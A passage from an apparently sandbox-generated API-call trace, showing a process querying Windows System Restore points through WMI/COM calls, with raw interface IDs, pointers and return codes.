riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6737eb0) returned 0x0 [0116.629] WbemDefPath:IUnknown:AddRef (This=0x6737eb0) returned 0x3 [0116.629] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x2 [0116.629] WbemDefPath:IWbemPath:SetText (This=0x6737eb0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=10") returned 0x0 [0116.629] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.629] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.629] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.630] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.630] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.630] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.630] IWbemClassObject:Get (in: This=0x673a918, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352ad70*=0, plFlavor=0x352ad74*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), pType=0x352ad70*=19, plFlavor=0x352ad74*=0) returned 0x0 [0116.630] IWbemClassObject:Get (in: This=0x673a918, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352ad70*=19, plFlavor=0x352ad74*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), pType=0x352ad70*=19, plFlavor=0x352ad74*=0) returned 0x0 [0116.630] CoTaskMemAlloc (cb=0x4) returned 0x77c218 [0116.630] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c218, puReturned=0x3526b58 | out: apObjects=0x77c218*=0x673ac00, puReturned=0x3526b58*=0x1) returned 0x0 [0116.630] IUnknown:QueryInterface (in: This=0x673ac00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673ac00) returned 0x0 [0116.630] IUnknown:QueryInterface (in: This=0x673ac00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.630] IUnknown:QueryInterface (in: This=0x673ac00, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.631] IUnknown:AddRef (This=0x673ac00) returned 0x3 [0116.631] IUnknown:QueryInterface (in: This=0x673ac00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.631] IUnknown:QueryInterface (in: This=0x673ac00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.631] IUnknown:QueryInterface (in: This=0x673ac00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673ac04) returned 0x0 [0116.631] IMarshal:GetUnmarshalClass (in: This=0x673ac04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.631] IUnknown:Release (This=0x673ac04) returned 0x3 [0116.631] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.631] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.631] IUnknown:QueryInterface (in: This=0x673ac00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.631] IUnknown:Release (This=0x673ac00) returned 0x2 [0116.631] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.631] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.631] IUnknown:QueryInterface (in: This=0x673ac00, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673ac00) returned 0x0 [0116.631] IUnknown:AddRef (This=0x673ac00) returned 0x4 [0116.631] IUnknown:Release (This=0x673ac00) returned 0x3 [0116.631] IUnknown:Release (This=0x673ac00) returned 0x2 [0116.631] CoTaskMemFree (pv=0x77c218) [0116.631] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.631] IUnknown:AddRef (This=0x673ac00) returned 0x3 [0116.632] IWbemClassObject:Get (in: This=0x673ac00, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.632] IWbemClassObject:Get (in: This=0x673ac00, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=11", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.632] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=11") returned 0x70 [0116.632] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=11") returned 0x70 [0116.632] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.632] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.632] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.632] IUnknown:Release (This=0x72015c) returned 0x1 [0116.633] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736df8) returned 0x0 [0116.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736df8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.634] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736df8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6737f20) returned 0x0 [0116.634] WbemDefPath:IUnknown:Release (This=0x6736df8) returned 0x0 [0116.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6737f20) returned 0x0 [0116.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.634] WbemDefPath:IUnknown:AddRef (This=0x6737f20) returned 0x3 [0116.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c218) returned 0x0 [0116.634] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c218, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.634] WbemDefPath:IUnknown:Release (This=0x77c218) returned 0x3 [0116.634] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.635] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.635] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.635] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x2 [0116.635] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x1 [0116.635] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.635] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.635] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6737f20) returned 0x0 [0116.635] WbemDefPath:IUnknown:AddRef (This=0x6737f20) returned 0x3 [0116.635] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x2 [0116.635] WbemDefPath:IWbemPath:SetText (This=0x6737f20, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=11") returned 0x0 [0116.635] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.635] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.635] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.635] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.635] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.635] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.635] IWbemClassObject:Get (in: This=0x673ac00, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352b5c0*=0, plFlavor=0x352b5c4*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), pType=0x352b5c0*=19, plFlavor=0x352b5c4*=0) returned 0x0 [0116.635] IWbemClassObject:Get (in: This=0x673ac00, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352b5c0*=19, plFlavor=0x352b5c4*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), pType=0x352b5c0*=19, plFlavor=0x352b5c4*=0) returned 0x0 [0116.636] CoTaskMemAlloc (cb=0x4) returned 0x77c258 [0116.636] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c258, puReturned=0x3526b58 | out: apObjects=0x77c258*=0x6739110, puReturned=0x3526b58*=0x1) returned 0x0 [0116.639] IUnknown:QueryInterface (in: This=0x6739110, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x6739110) returned 0x0 [0116.640] IUnknown:QueryInterface (in: This=0x6739110, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.640] IUnknown:QueryInterface (in: This=0x6739110, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.640] IUnknown:AddRef (This=0x6739110) returned 0x3 [0116.640] IUnknown:QueryInterface (in: This=0x6739110, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.640] IUnknown:QueryInterface (in: This=0x6739110, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.640] IUnknown:QueryInterface (in: This=0x6739110, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x6739114) returned 0x0 [0116.640] IMarshal:GetUnmarshalClass (in: This=0x6739114, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.640] IUnknown:Release (This=0x6739114) returned 0x3 [0116.640] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.641] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.641] IUnknown:QueryInterface (in: This=0x6739110, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.641] IUnknown:Release (This=0x6739110) returned 0x2 [0116.641] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.641] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.641] IUnknown:QueryInterface (in: This=0x6739110, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x6739110) returned 0x0 [0116.641] IUnknown:AddRef (This=0x6739110) returned 0x4 [0116.641] IUnknown:Release (This=0x6739110) returned 0x3 [0116.641] IUnknown:Release (This=0x6739110) returned 0x2 [0116.641] CoTaskMemFree (pv=0x77c258) [0116.641] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.641] IUnknown:AddRef (This=0x6739110) returned 0x3 [0116.641] IWbemClassObject:Get (in: This=0x6739110, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.642] IWbemClassObject:Get (in: This=0x6739110, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=12", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.642] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=12") returned 0x70 [0116.642] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=12") returned 0x70 [0116.642] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.642] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.642] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.642] IUnknown:Release (This=0x72015c) returned 0x1 [0116.643] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e08) returned 0x0 [0116.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.644] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6737f90) returned 0x0 [0116.644] WbemDefPath:IUnknown:Release (This=0x6736e08) returned 0x0 [0116.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6737f90) returned 0x0 [0116.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.644] WbemDefPath:IUnknown:AddRef (This=0x6737f90) returned 0x3 [0116.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c258) returned 0x0 [0116.645] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c258, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.645] WbemDefPath:IUnknown:Release (This=0x77c258) returned 0x3 [0116.645] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.645] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: 